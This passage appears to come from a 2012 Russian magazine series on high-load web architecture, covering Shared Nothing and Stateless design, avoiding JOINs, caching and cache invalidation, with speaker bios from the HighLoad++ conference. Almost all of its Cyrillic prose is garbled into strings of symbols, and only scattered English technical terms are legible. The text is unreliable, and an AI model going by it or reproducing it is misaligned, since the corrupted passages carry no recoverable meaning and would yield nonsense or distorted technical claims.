• Shared Nothing (."?>4+ ,6%7 2172%(02 $%6"1*0*&4& * 0"&->-0("(-#$4&, $% 0,3%0(1,%( %>*$-+ (-#.* -(."6");• Stateless (/)-C%00 $% <)"$*( 0-0(-2$*%)

K"6$4% B,$.C*--$"7@$4% #"0(* )"-5-(":( * <)"$2(02 $" )"6$4< 0%)1%-)"< 0*0(%&4.

+ !"#$%&'#()*#'+ ,(-.+)+#&+- /)(00&1+0$'+ 2',&-'#3()*#'+ 4(053(6&,'7(#&+

+ /'#%+8%&& Shared Nothing & Stateless+ /,&3&$( $'#%+8%&9 Shared Nothing & Stateless+ :7;-#'03* $'.( & .(##<=

- /+5&,'7(#&++ >,'6)+4( &#7()&.(%&& $+5(+ >,'6)+4( 03(,3( 0 #+8,'2,+3<4 $+5+4

!"#$% 08 /163/ 2012

!"#$%&$' ()%*$+)' (,-.),$(/ * 0-12$&)) Vuga, 0-%-#$' 3$&)1$-4%(' )5#$1) 6,' Facebook. 7#$86$, 0-56$ -&) (%-,0&*,)(/ ( 2-9-.4: 2#-",41-:, * &)9 ";,) 6#*5)4 1$(<%$";: &4(0-,/0- 1),,)$#6-8 SELECT’-8 )3 PostgreSQL 8 64&/ &$ -6&-: ()(%414. !&) 24#4<,) 2-,&-(%/= &$ 2-69-6 Memory State: 6$&&;4 &$>$,) 9#$&)%/(' ) -"(,*-.)8$%/(' 2#'1- 8 -24#$%)8&-: 2$1'%). ?%-5: #4"'%$ 2#$0%)>4(0) -%0$3$,)(/ -% "$3; 6$&&;9, $ 2$#$ (-%4& (4#84#-8 -0$3$,)(/ ,)<&)-1). ?9 2#-(%- 8;0,=>),): -&) (%$,) &4 &*.&;.

@ 2#)&+)24, ,="-4 1$(<%$")-#-8$&)4 (8 %-1 >)(,4 5-#)3-&%$,/-&-4) 6-(%).)1- &$ ->4&/ 1&-5)9 %49&-,-5)'9. A4:>$( ->4&/ >$(%- #4>/ )64% - %-1, >%-"; 2#) (-36$&)) (4#8)($ &4 2#)<,-(/ 2,$%)%/ (,)<0-1 1&-5- 3$ .4,43-. B,' C%--5- 8$.&- 3&$%/, 0$0$' %49&-,-5)' &$)"-,44 (--%84%(%8*4% 6$&&-1* 2#-D),= &$5#*30) ( 1)&)1$,/&;-1) 3$%#$%$1) .4,43$.

7#) C%-1 ->4&/ >$(%-, 0-56$ &$>)&$=% #$31;<,'%/ - 1$(<%$")-#-8$&)), %- 3$";8$=% 2#- D)&$&-(-8;: $(240% %-5- .4 5-#)3-&%$,/-&-5- 1$(<%$")#-8$&)'. E40-%-#;4 6*1$=%, >%- 5-#)3-&%$,/&-4 1$(-<%$")#-8$&)4 — C%- #4$,/&- 2$&$-+4'. F$3&4(,) 6$&&;4, 8(4 #$3"#--($,) &$ -%64,/&;4 (4#84#; — ) 8(4 (%$,- &-#1$,/&-. !6&$0- C%) ,=6) 3$";8$=% - &$0,$6&;9 #$(9-6$9 (-84#946$9) — 0$0 D)&$&(-8;9 (2--0*20$ &-8;9 (4#84#-8), %$0 ) C0(-2,*$%$+)-&&;9. G-56$ 1; #$3&-()1 8(4 &$ 0-12-&4&%;, 8-3&)0$=% &$0,$6&;4 #$(9-6; &$ 0-11*&)-0$+)= 2#-5#$11&;9 0-12-&4&%-8 14.6* (-"-:. H#*"- 5-8-#', 9-2-8 (%$&-8)%(' "-,/<4.

@(2-1&)1 *.4 3&$0-1;: %4"4 2#)14#. G-56$ 1; 3$9-6)1 &$ (%#$&)>0* Facebook, 1-I&;: JavaScript )64% &$ (4#84#, 0-%-#;: 6-,5--6-,5- 6*1$4% ) %-,/0- >4#43 &40-%-#-4 8#41' &$>)&$4% -%6$8$%/ 8$1 8$<) 6$&&;4. @(4 &$",=6$,)

2-6-"&*= 0$#%)&*: 9->4%(' *.4 2-(1-%#4%/ ) "4.$%/ 6$,/<4 2)%/ 0-D4, $ -&- 8(4 5#*3)%(', 5#*3)%(' ) 5#*3)%('. E$6- "; 9#$&)%/ 6$&&;4 >*%/->*%/ «2-",).4», &- * Facebook *.4 %$0-: 8-31-.&-(%) &4%.

&'()&*(&*+ #(,"JI4 2$#$ (-84%-8 6,' *2#-I4&)' 5-#)3-&%$,/&-5- 1$(<%$")#-8$-&)'. 74#8$' #40-14&6$+)': 2#--5#$11)#*:%4 %$0, >%-"; 8$< 0-6 (-(%-', 0$0 "; )3 (,-48 ) 0$.6;: (,-: -%84>$, 3$ 0$0-:-%- -2#464-,4&&;: 2#-+4(( 8 +42->04 -"-#$"-%0) 6$&&;9. A0$.41, 4(,) * 8$( )64% #$"-%$ ( "$3-: 6$&&;9, %- -&$ 6-,.&$ -(*I4(%8,'%/(' 8 -6&-1 14(%4, $ &4 ";%/ #$3"#-($&&-: 2- 8(41 (0#)2%$1. G 2#)14#*, 1; (%#-)1 (%#$&)+* 2-,/3-8$%4,'. @(4 &$>)&$4%(' ( %-5-, >%- '6#- 3$-2*(0$4% 1-6*,/ ")3&4(-,-5)0) 6,' 2-(%#-4&)' (%#$&)+; 2-,/3-8$%4-,'. K%-% 1-6*,/ 3$2#$<)8$4% * &)-.4,4.$I45- (,-' 9#$&4&)' 6$&&;9 )&D-#1$+)= -" C%-1 0-&0#4%&-1 2-,/3-8$%4,4. A,-= ")3&4(-,-5)0) &)>45- &4 )384(%&- - %-1, 564 ,4.$% 6$&&;4: 3$04<)#-8$&; ,) -&), 3$<$#6)#-8$&; ,) (<$#6)&5 — C%- #$3&4(4&)4 6$&&;9 &$ #$3&;4 (4#84#; 9#$&4&)' 6$&&;9, - >41 1; "*641 5-8-#)%/ 8 "*6*I)9 *#-0$9), ),) ( &)1) (64,$,) 4I4 >%--&)"*6/ &49-#-<44. L-6*,/ 2#-(%- 3$2#$<)8$4% )&D-#1$+)=, 8;3;8$' (--%84%(%8*=I*= D*&0-+)=. M*&0+)' >%4&)' )&D-#1$+)) - 2-,/3-8$%4,4 #$(2-,-.4&$ 8 (,-4 9#$&4&)' 6$&&;9. @ (8-= ->4#46/, (,-: 9#$&4&)' 6$&&;9 2- %)2* 3$2#-($ -2#464,'4%, 8 0$0-1 )14&&- 9#$&),)I4 9#$&)%(' 2-,/-3-8$%4,/. @ 04<4? @ "$34 6$&&;9? @ D$:,-8-: ()(%414? ? 6$,44 8;-3;8$4% (--%84%(%8*=I*= D*&0+)= &).4,4.$I45- (,-'.

N%- 6$4% %$0$' (,-)(%$' (941$? !&$ 6$4% 8-31-.&-(%/ 24#42)(;-8$%/, 8;0)6;8$%/ ),) 6-"$8,'%/ +4,;4 (,-). E$2#)14#, #4<),) 8; 6-"$8)%/ 04<)#-8$&)4 6,'

G-&+42+)' Stateless -3&$>$4%, >%- 2#-+4(( 2#-5#$11; &4 9#$&)% (8-4 (-(%-'&)4. 7-,/3-8$%4,/ 2#)<4, ) 2-2$, &$ C%-% 0-&0#4%&;: (4#84#, ) &4% &)0$0-: #$3&)+;, 2-2$, 2-,/3-8$-%4,/ &$ C%-% (4#84# ),) &$ 6#*5-:. 7-(,4 %-5- 0$0 3$2#-( "*64% -"#$"-%$&, C%-% (4#84# 2-,&-(%/= 3$"*64% )&D-#1$+)= -" C%-1 2-,/3-8$%4,4. 7-,/3-8$%4,/ 8-8(4 &4 -"'3$& 8(4 (8-) (,46*=-I)4 3$2#-(; -%2#$8,'%/ &$ C%-% .4 (4#84#, &4 6-,.4& 8%-#-: #$3 2#)9-6)%/ &$ &45- .4. O$0)1 -"#$3-1, 1; 1-.41 6)&$1)>4(0) 14&'%/ 0-,)>4(%8- (4#84#-8 ) &4 3$"-%)%/(' - %-1, >%-"; #-*-%)%/ 2-,/3-8$%4,' &$ &*.&;: (4#8$0.

E$84#&-4, C%- -6&$ )3 (4#/43&;9 2#)>)&, 2->41* 84" %$0 ";(%#- #$38)8$4%('. @ &41 5-#$36- 2#-I4 64,$%/ 2#),-.4&)', >41 2)($%/ 0,$(()>4(0)4 -D,$:&-8;4 2#-5#$11;. G-&+42+)' «-%84% — 3$2#-(» ) %-% D$0%, >%- 8$<$ 2#-5#$11$ .)84% 200 1),-,)(40*&6 ),) 1$0()1*1 -6&* (40*&6* (2-(,4 >45- -&$ 2-,&-(%/= *&)>%-.$4%('), 2#)84,) 0 %-1*, >%- 8 %$0)9 #$(2#-(%#$&4&&;9 '3;0$9 2#-5#$11)#-8$&)', 0$0 PHP, 6- ()9 2-# &4% ("-#I)0$ 1*(-#$.

!2)($&&;: 2-69-6 '8,'4%(' 0,$(()>4(0)1: -& 2#-(%-: ) &$64.&;:, 0$0 (0$,$. !6&$0- 8 2-(,46&44 8#41' &$1 8(4 >$I4 ) >$I4 2#)9-6)%(' -%0$3;8$%/(' -% &45-.

#%)*)#" #(-.$/.)0 SHARED NOTHING ) STATELESSA45-6&' 24#46 84"-1 8-3&)0$=% &-8;4 3$6$>), 0-%-#;4 (%$8'% &-8;4 2#-",41;. G-56$ 1; 5-8-#)1 2#- Stateless, C%- -3&$>$4%, >%- 0$.6;4 6$&&;4 0$.6-1* 2-,/3-8$%4,= 1; 3$&-8- %$I)1 )3 9#$&),)I$, $ C%- 2-6>$( ";8$4% ->4&/ 6-#-5-. @-3&)0$4% #4-3-&&-4 .4,$&)4 2-,-.)%/ 0$0)4-%- 6$&&;4 8 2$1'%/, (64,$%/ &4 (-8(41 Stateless. K%- (8'3$&- ( %41, >%- (45-6&' 84" (%$&-8)%(' 8(4 "-,44 ) "-,44 )&%4#$0%)8&;1. J(,) 8>4#$ >4,-840 3$9-6), 8 84"-2->%* ) &$.)1$, &$ 0&-20* «Reload», >%-"; 2#-84#)%/ &-8;4 (--"I4&)', %- (45-6&' C%)1 *.4 3$&)1$4%(' (4#84#. !& 41* 5-8-#)%: «!, >*8$0, 2-0$ %; ()64, &$ C%-: (%#$&)>04, %4"4 2#)<,) &-8;4 (--"I4&)'».

@-3&)0$=% &-8;4 3$6$>), 0-%-#;4 2#)8-6'% 0 %-1*, >%- 2-6-9-6 ( Shared Nothing ) -%(*%(%8)41 (-(%-'&)' 8 2$1'%) )&-56$ &4 '8,'4%(' -"'3$%4,/&;1. L; *.4 (%$,0)8$,)(/ &4-6&-0#$%&- ( ()%*$+)'1) &$<)9 0,)4&%-8, 0-%-#;1 1; 5-8-#)1: «!% C%-5- -%0$.)%4(/, 2-,-.)%4 6$&&;4 8 2$1'%/» ) &$-"-#-% «E$2#$8-,':%4 ,=64: &$ -6)& ) %-% .4 (4#84#». E$2#)14#, 0-56$ 8-3&)-0$4% -%0#;%$' >$%-0-1&$%$, ,=64: )144% (1;(, #-*%)%/ &$ -6)& ) %-% .4 (4#84#, >%-"; C%- 8(4 #$"-%$,- ";(%#44.

F$((0$.41 2#- 4I4 -6)& (,*>$:, ( 0-%-#;1 (%$,0)8$,)(/. !6)& &$< 3&$0-1;: #$3#$"$%;8$, &$ Ruby on Rails )5#*<0* &$2-6-")4 «P#4&;» (-&,$:& 6#$0) ) "-)). @(0-#4 2-(,4 3$2*(0$ -& (%-,0&*,(' ( 0,$(()>4(0-: 2#-",41-:: 4(,) &4(0-,/0- >4,-840 &$9-6'%(' 8 #$10$9 -6&-5- "-', 0$.6;: 2-,/3-8$%4,/ 2-(%-'&&- 8;%$(0)8$4% )3 QB 6$&&;4, 0-%-#;4 8- 8#41' C%-5- "-' 8-3&)0,). @ )%-54 8(' C%$ 0-&(%#*0+)' (1-5,$ 6-.)%/ %-,/0- 6- 30 %;('> 3$#45)(%#)#-8$&-&;9 =34#-8, $ 6$,/<4 -&$ 2#-(%- 24#4(%$,$ #$"-%$%/.

"#",$1)2

!"#$% 09 /164/ 2012106

(* "3*(%(3 !"#$%#&' #()*(%+,#-,' .,/0,+1#$"0- #(2,3 4$')(#-- /%+/,0"/ *,2,#-, )*$5+,', "%/6(##&7 " %&"$4$3 #(8*964$3, 4$#"9+10-*$%(#-,, )*$,40-*$%(#-, '("20(5-*9,'&7 (*7-0,409*, )*$%,.,#-, #(8*96$:#&7 0,"0-*$%(#-3 - $)0-'-6(;-/ "(30$%. < :-"+$ #(2-7 4+-,#0$% %7$./0 -#%,"0$*& -6 =$""-- - "$ %",8$ '-*(, ( 0(4>, )*$,40& «<?$#0(40,», «@+1.$*(.$», «A'7$#,0», Photosight.ru - .*98-,. <$ %*,'/ 4$#"9+10(;-3 '& :("0$ "0(+4-%(,'"/ " 0,', :0$ '#$8-, #, 6#(B0 "('&7 $"#$% — :0$ 0(-4$, '("20(5-*$%(#-, - 4(4-' $#$ 5&%(,0, 4(4-, -#"0*9',#0& - .+/ :,8$ -")$+169B0"/. @0( )95+-4(;-/ )*$.$+>(,0 ",*-B "0(0,3 «C:,5#-4 )$ %&"$4-' #(8*964('». < D0-7 "0(01/7 '& )$"0(*(,'"/ )$"+,.$%(0,+1#$ *(""4(6(01 $5$ %",7 -#"0*9',#0(7, 4$0$*&, -")$+169B0"/ )*- )$"0*$,-#-- (*7-0,409*& %&"$4$#(8*9>,##&7 "-"0,'.

#45667896:;9 <;=7>;?@54A?;9 B56C@5D7=;E5?79

• A,-)(%-(%/ 0-6$;• L)&)1)3$+)' )(2-,/3-8$&)' (,-.&;9 3$2#-(-8 (#$3* 0 &4(0-,/0)1 %$",)+$1;• E)30$' (%424&/ (8'3&-(%) 0-6$

!"#$% 08 /163/ 2012

!"#$%"&'()#)*. +,)#'($ -(" & .#"/.("* .0)1) "2)3$ !4".(": 3'," ,"!/#/($ ("#$5" ",3" 1).(" — .#"* 04'3)3/6 ,'3370. 8#/ &7 ,"9'&#6)() :'4,/4"&'3/), / ()!)4$ !"#$%"&'()#/ 1";<( #)='($ & 4'%370 9'%'0 ,'3370. > "9723"* .0)1) &'1 !4/,)(.6 !)4)#"-!'(/($ &).$ .'*( / &)%,) &.('&/($ .""(&)(.(&<?@/) !4"&)45/. > .#"/.("* .0)1) 3<=3" #/:$ /.!4'&/($ #";/5< ",3";" .#"6, ",3";" 5"354)(3";" 1",<#6.

&'()*+&,- #+." / ."**0! +#),<?@'6 &'=3'6 %','2', 5"("4<? 3)"90",/1" 4):/($, 2("97 /%9)='($ !4"9#)1 !4/ ;"4/%"3('#$3"1 1'.:('9/4"&'3//, — 1/3/1/%/4"&'($ .&6%3".($ 5'5 5",', ('5 / ,'3370. A'!4/1)4, ).#/ < &'. & SQL-%'!4".'0 /.!"#$%<?(.6 JOIN’7, < &'. <=) ).($ !"()3B/'#$3'6 !4"9#)1'. +,)#'($ JOIN & 4'15'0 ",3"* 9'%7 ,'3370 1"=3". C & 4'15'0 ,&<0 9'% ,'3370, 4'%3).)3370 !" 4'%-371 .)4&)4'1, <=) 3)&"%1"=3". D9@'6 4)5"1)3,'B/6: .('4'*-().$ "9@'($.6 . 04'3/#/@)1 1/3/1'#$3" !4".(71/ %'!4".'1/, /()4'B/61/, :';'1/.

E(" ,)#'($, ).#/ 9)% JOIN’' 3) "9"*(/.$? +,)#'*() );" .'1/: .,)#'#/ ,&' %'!4".', !)4)13"=/#/ & PHP — & -("1 3)( 3/2);" .(4':3";". F#6 !4/1)4' 4'..1"(4/1 5#'../2).5<? %','2< !".(4"-)3/6 G4)3,#)3(7. >'1 3<=3" !",36($ &.)0 ,4<%)* !"#$%"&'()#6, ,#6 3/0 %'!4"./($ &.) !".#),3/) %'!/./, ,#6 &.)0 %'!/.)* ."94'($ 5"#/2).(&" 5"11)3('4/)& — &"( ;,) ."9#'%3 .,)#'($ -(" ",3/1 %'!4"."1 (. 3)5"("471 5"#/2).(&"1 &#"=)3370 JOIN’"&) "."9)33" &)#/5. >.);" ",/3 %'!4". — / &7 !"#<2')() &.? 3<=3<? &'1 /3G"4-1'B/?. A" 2(" &7 9<,)() ,)#'($, 5";,' !"#$%"&'()#)* / %'!/.)* .('3)( 13";" / 9'%' ,'3370 !)4).('3)( .!4'&#6($.6? H"-0"4":)1< 3'," 97 4'.:'4,/($ !"#$%"&'()#)* (4'%3).(/ 4'&3"1)43" 3' 4'%37) .)4&)47 9'% ,'3370). H"36(3", 2(" & -("1 .#<2') &7!"#3/($ "!)4'B/? JOIN <=) 3) !"#<2/(.6: ,'337)-(" 4'%,)#)37 !" 4'%371 9'%'1. I'5 2(" !4/,)(.6 ,)#'($ &.) &4<23<?. >7&", "2)&/,)3: ,)#'*() -(" &4<23<? . .'1";" 3'2'#'. +3'2'#' %'!4"./() /% 9'%7 ,'3370 &.)0 ,4<%)* !"#$%"&'()#6 (!)4&7* %'!4".). J'()1 %'9)4/() !".#),3/) %'!/./ -(/0 !"#$%"&'()#)* (&("4"* %'!4". /#/ ;4<!!' %'!4"."&). J'()1 & !'16(/ !4"/%&),/() ."4(/4"&5< / &79)4/() (", 2(" &'1 3<=3". K'5(/2).5/ &7 &7!"#36)() "!)4'B/? JOIN &4<23<?. F', &"%1"=3" &7 &7!"#3/() )) 3) ('5 -GG)5(/&3", 5'5 -(" .,)#'#'

97 9'%' ,'3370. A" %'(" &7 3/5'5 3) ";4'3/2)37 "9L)1"1 -("* 9'%7 ,'3370 & 04'3)3// /3G"41'B//. >7 1"=)() 4'%,)#6($ / 4'%3"./($ &':/ ,'337) 3' 4'%37) .)4&)47 /#/ ,'=) & 4'%37) +MNF! >.) -(" ."&.)1 3) ('5 .(4':3", 5'5 1"=)( !"5'%'($.6. > !4'&/#$3" !".(4")33"* .#"/-.("* ./.()1) 9"#$:'6 2'.($ -(/0 %'!4"."& 9<,)( %'5):/4"&'3'. D3/ !4".(7) / #);5" 5):/4<?(.6 — & "(-#/2/) "( 4)%<#$('("& &7!"#3)3/6 "!)4'B// JOIN. O@) ",/3 1/3<. &'4/'3(' . JOIN: !4/ ,"9'&#)3// !"#$%"&'()#)1 3"&"* %'!/./ &'1 3<=3" .94"./($ 5):/ &79"4"5 &.)0 );" ,4<%)*! C !4/ ('5"1 4'.5#',) 3)/%&).(3", 2(" 3' .'1"1 ,)#) 9<,)( 4'9"('($ 97.(4)).

#$1/%+'"*/$+#),<?@/* &'=37* /3.(4<1)3(, . 5"("471 17 .);",36 !"%3'5"-1/1.6, — 5):/4"&'3/). E(" ('5") 5):? P): — -(" ('5") 1).(", 5<,' 1"=3" !", 5'5/1-(" 5#?2"1 !"-#"=/($ ,'337), 5"("47) ,"#;" &72/.#6?(. J'!"13/() ",/3 /% &'=3)*:/0 1"1)3("&: 5): ,"#=)3 &'1 !" -("1< 5#?2< "(,'($ ,'337) 97.(4)), 2)1 &72/.#/($ /0 %'3"&". Q7 3)",3"54'(3" .('#5/&'#/.$ . ./(<'B/)*, 5";,' -(" 97#" 3) ('5 / #?,/ 9)..17.#)33" ()46#/ &4)16. 83";,' 9'%' ,'3370 4'9"-(')( ,".('("23" 97.(4" / !4"@) .0",/($ 3'!461<? 5 3)*.

R ,<1'?, 3) .("/( ;"&"4/($, 2(" 5): ,"#=)3 97($ ),/371 ,#6

M2)93/5 !" &7."5/1 3';4<%5'1. M4"5 S 3

!"#$% 09 /164/ 2012 107

+234 567878%&).(37* .!)B/'#/.( !" Highload-!4")5('1. O;" 5"1!'3/6 «T'9"4'("4/6 D#);' N<3/3'» .!)B/'#/%/4<-

)(.6 3' 5"3.'#(/3;), 4'%4'9"(5) / ().(/4"&'3// &7."5"3';4<-=)3370 &)9-!4")5("&. +)*2'. 6&#6)(.6 "4;'3/%'("4"1 5"3G)-4)3B// HighLoad++ (www.highload.ru). U(" 5"3G)4)3B/6, !".&6@)3-3'6 &7."5/1 3';4<%5'1, 5"("4'6 )=);",3" ."9/4')( #<2:/0 & 1/4) .!)B/'#/.("& !" 4'%4'9"(5) 54<!370 !4")5("&. N#';",'46 -("* 5"3G)4)3B// %3'5"1 ." &.)1/ &),<@/1/ .!)B/'#/.('1/ 1/4' &7."5"3';4<=)3370 ./.()1.

#97:;<7;87 +:8=9>+!)B/'#/.( !" 9'%'1 ,'3370, 5"("47* ,"#;") &4)16 4'9"('# & MySQL, ;,) "(&)2'# 5'5 4'% %' &7."5"3';4<-=)337* .)5("4.

N7.(4"(' MySQL — & 9"#$:"* .()!)3/ %'.#<;' /1)33" P".(/ D./!"&'. > .&") &4)16 "3 %'3/-1'#.6 1'.:('9/4<)1".($? MySQL 5.5. +)*2'. "(&)2')( & Mail.Ru %' 5#'.()43<? NoSQL 9'%< ,'3370 Tarantool, 5"("4'6 "9.#<=/&')( 500–600 (7.62 %'!4"."& & .)5<3,<. 8.!"#$%"&'($ -("( Open Source !4")5( 1"=)( #?9"* =)#'?@/*.

?<@:8A B<=C87V):)3/6 ,#6 "4;'3/%'B// &/,)"(4'3.#6B//, 5"("47) .<@).(&<-?( & 1/4) 3' ,'3-37* 1"1)3(, 1"=3" !)4).2/('($ !" !'#$B'1. Q'5.

4'%4'9"('# ",3" /% 3/0 — Erlyvideo (erlyvideo.org). U(" .)4&)43") !4/#"-=)3/), 5"("4") %'3/1')(.6 !"("5"-&71 &/,)". H4/ ."%,'3// !","9370 /3.(4<1)3("& &"%3/5')( B)#'6 5<2' .#"=3)*:/0 !4"9#)1 ." .5"4".($?. M Q'5./1' ('5=) ).($ 3)5"("47* "!7(, .&6%'337* . 1'.:('9/4"&'3/-)1 .4),3/0 .'*("& (3) ('5/0 54<!370, 5'5 Mail.Ru). H", .4),3/1/ 17 !",-4'%<1)&')1 ('5/) .'*(7, 5"#/2).(&" "94'@)3/* 5 5"("471 ,".(/;')( "5"#" 60 1/##/"3"& & .<(5/.

#97:;<7;87 ?<C6@9>N/%3).-'3'#/(/5 & 5"1!'3// D#);' N<3/3'. P"3.('3-(/3 !4/:)# /% 1/4' .<!)45"1-!$?()4"&, ;,) ,"#;") &4)16 «!/-#/#» 4'%#/237)

3'<237) !4/#"=)3/6, .&6%'337) . 2/.#",4"9/#5'1/. > 5'2).(&) 9/%3).-'3'#/(/5' <2'.(&<)( &" &.)0 5"3.'#(/3;"&70 !4")5('0 5"1!'3//, 9<,$ (" ."B/'#$37) .)(/, 54<!37) /3()43)(-1';'%/37 /#/ ./.()17 -#)5(4"3370 !#'()=)*.

HIGHLOAD-/*&,%D#,+%0

#3C8E9><783

• O,/37* 5): ,#6 &.)0 9-5)3,"&;• H4"9#)1' /3&'#/,'B// 5):';• H4"9#)1' .('4(' . 3)!4";4)(71 5):)1

!"#$%

&%'#( 08 /163/ 2012

!"#$ %&'#()*!. +,-(#(.# '#/.,*!-((0$ )-((0$ ,-1)#23(* )24 '-5)*6* .1 %&'#()*! 7*5#8 )-83 (#'*8*,*# 9,#.7:;#"8!* ! "'*,*"8. .1!2#<#(.4 )-((0$, (* 1(-<.8#23(* :"2*5(.8 2*6.-': *%"2:5.!-(.4 '#/-. =,#)"8-!38#, <8* !-7 (:5(* "%,*".83 '-'*>-8* 1-'#/.,*!-((0> &2#7#(8: ! &8*7 "2:<-# !0 )*25(0 9,*>8. 9* !"#7 %&'#()-7 . "%,*".83 &8*8 &2#7#(8 ! 2*'-23(*7 '#/#. ? 9,*@#""# ."9*231*!-(.4 9*)*%(*6* *%$*)- : !-" !*1-(.'-#8 9#,!-4 9,*%2#7- —(#'*("."8#(8(*"83 '#/-. =,*;# 6*!*,4, 6)#-8* )-((0# ! '#/# %:):8 :5# "%,*/#(0, - 6)#-8* #;# (#8. ? ,#1:238-8# <-"83 9*231*!-8#2#> !.)48 #;# "8-,0# )-((0#, - '8*-8* — :5# (*!0#. ?8*,-4 9*8#(@.-23(-4 9,*%2#7- 8-'5# "!41-(- " @#2*"8(*"83A )-((0$. B*9:"8.7, ! *)(*7 .1 '#/#> "%,*".83 &2#7#(8 (# :)-2*"3. C8* 8#9#,3 )#2-83? =*-9,*%:>8# (->8. ',-".!*# . &2#6-(8(*# ,#/#(.# &8*6* !*9,*"-. =,.>8. 8:)- #;# ,-1 <#,#1 7.(:8:? D '*7: 9,.>8.? E;# *)(- (-)"8,*>'- (-) "."8#7*> '#/.,*!-(.4? F: ., (-'*(#@ , 62-!(-4 9,*%2#7- — ! "2:<-# 2*'-23(0$ '#/#> )-((0$ *)(. . 8# 5# )-((0# %:):8 !0<."2483"4 7(*6*',-8(* (9* <."2: '#/#>). G-'8.<#"'. 70 9#,#'2-)0!-#7 (-6,:1': (- %-1: )-((0$, <8* (# !"#6)- $*,*/*.

?8*,*> !-5(0> 7*7#(8. H#/ — &8* "'*,## "9*"*% 1-7-1-83 9,*%2#7: 9,*.1!*).8#23(*"8., - (# ,#/.83 ##. F*, %#1:"2*!(*, %0!-A8 ".8:-@.., '*6)- ,#/.83 9,*%2#7: *<#(3 )*,*6*. =*&8*7: !0 6*!*,.8#: «+*,*/*, &8: 8,#;.(: ! "8#(# 4 1-7-5: /8:'-8:,-'*>, . %:)#7 ):7-83, <8* ## 1)#"3 (#8». I(*6)- &8* ,-%*8-#8 — %*2## 8*6*, &8* ,-%*8-#8 *<#(3 )-5# <-"8*. J"*%#((* '*6)- !0 9*9-)-#8# ! '#/ . 8-7 :5# 2#5-8 )-((0#, '*8*,0# !0 $*8#2. 9*'-1-83. H2-"".<#"'.> 9,.7#, — "<#8<.' '*2.<#"8!- ),:1#>. K8* "<#8<.' ! %-1# )-((0$, . !7#"8* 8*6*, <8*%0 9#,#%.,-83 !"A %-1: )-((0$ ! 9*."'-$ !-/.$ ),:1#>, 6*,-1)* 9,*;# &8. )-((0# 1-'#/.,*!-83 (. (# 9#,#"<.80!-83 '-5)0> ,-1).

B24 '#/- #"83 ',.8#,.> &LL#'8.!(*"8. ."9*231*!-(.4, 8* #"83 9*'-1-8#23 8*6*, <8* *( ,-%*8-#8, — *( (-10!-#8"4 Hit Ratio. K8* *8(*/#(.# '*2.<#"8!- 1-9,*"*!, )24 '*8*,0$ *8!#8 (-/#2"4 ! '#/#, ' *%;#7: <."2: 1-9,*"*!. E"2. *( (.1'.> (50–60%), 1(-<.8, : !-" #"83 2./(.# (-'2-)(0# ,-"$*)0 (- 9*$*) ' '#/:. K8* *1(--<-#8, <8* 9,-'8.<#"'. (- '-5)*> !8*,*> "8,-(.@# 9*231*!-8#23, !7#"8* 8*6* <8*%0 9*2:<.83 )-((0# .1 %-10, #;# . $*).8 ' '#/:: !04"(4#8, <8* )-((0$ )24 (#6* 8-7 (#8, 9*"2# <#6* .)#8 (-9,47:A ' %-1#. D &8* 2./(.# )!#, 9483, )#"483, "*,*' 7.22."#':().

H-' *%#"9#<.!-83 $*,*/.> Hit Ratio? ? 8#$ 7#"8-$, 6)# : !-" %-1- )-((0$ 8*,7*1.8, . ! 8#$ 7#"8-$, 6)# )-((0# 7*5(* 9#,#!0<."2483 )*"8-8*<(* )*26*, 8-7 !0 !80'-#8# Memcache, Redis .2. -(-2*-6.<(0> .("8,:7#(8, '*8*,0> %:)#8 !09*2(483 L:('@.A %0"8,*6* '#/-, — . &8* (-<.(-#8 !-" "9-"-83. =* ',->(#> 7#,#, !,#7#((*.

)(*+,#-% .$/%,.0%".. '#1%F* " ."9*231*!-(.#7 '#/- !0 %*(:"*7 9*2:<-#8# 9,*%2#7: .(-!-2.)-@.. '#/-. ? <#7 ":83? ?0 9*2*5.2. )-((0# ! '#/ . %#,#8# .$ .1 '#/-, *)(-'* ' &8*7: 7*7#(8: *,.6.(-23(0# )-((0# :5# 9*7#(42."3. F-9,.7#,, M-/#(3'- 9*7#(42- 9*)9."3 9*) "!*#> '-,8.('*>, - !0 1-<#7-8* 9*2*5.2. *)(: "8,*<': ! '#/ !7#"8* 8*6*, <8*%0 84(:83 '-5)0> ,-1 .1 %-10 )-((0$. ? ,#1:238-8# !0 9*'-10!-#8# "8-,0# )-((0# — &8* . #"83 9,*%2#7- .(!-2.)--@.. '#/-. ? *%;#7 "2:<-# *(- (# .7##8 ,#/#(.4, 9*8*7: <8* &8- 9,*%2#7- "!41-(- " ."9*231*!-(.#7 )-((0$ !-/#6* %.1(#"-9,.2*5#(.4. J"(*!(*> !*9,*": '*6)- *%(*!2483 '#/? J8!#8.83 (- (#6* 9*)<-" (#9,*"8*.

F-9,.7#,, 9*231*!-8#23 9:%2.':#8 ! "*@.-23(*> "#8. (*!0> 9*"8 — )*9:"8.7, ! &8*8 7*7#(8 70 908-#7"4 .1%-!.83"4 *8 !"#$ .(!-2.)(0$ )-((0$. =*2:<-#8"4, (:5(* "%,*".83 . *%(*!.83 !"# '#/., '*8*,0# .7#A8 *8(*/#(.# ' &8*7: 9*"8:. ? $:)/#7 "2:<-#, #"2. <#2*!#' )#2-#8 9*"8, !0 "%,-"0!-#8# '#/ " #6* 2#(80 9*"8*!, "%,-"0!-#8# !"# '#/. " 2#(80 9*"8*! #6* ),:1#>, "%,-"0!-#8# !"# '#/. " 2#(80 2A)#>, : '*8*,0$ ! ),:134$ #"83 8#, '8* ! &8*7 "**%;#"8!#, . 8-' )-2##. ? .8*6# !0 "%,-"0!-#8# 9*2*!.(: '#/#>

! "."8#7#. H*6)- N:'#,%#,6 9:%2.':-#8 9*"8 )24 "!*.$ *).((-)@-8. " 9*-2*!.(*> 7.22.*(*! 9*)9."<.'*!, 70 <8* — )*25(0 "%,*".83 *).((-)-@-83 " 9*2*!.(*> 7.22.*(*! '#/#> L,#()2#(8 : !"#$ &8.$ subscriber’*!? H-' %083 " 8-'*> ".8:-@.#>? F#8, 70 9*>)#7 ),:6.7 9:8#7 . %:)#7 *%(*!-2483 '#/ 9,. 1-9,*"# (- L,#()2#(8:, 6)# #"83 &8*8 (*!0> 9*"8. O."8#7- *%(-,:5.!-#8, <8* '#/- (#8, .)#8 . !0<."24#8 1-(*!*. =*)$*) 9,*"8*> . (-)#5(0>, '-' "'-2-.

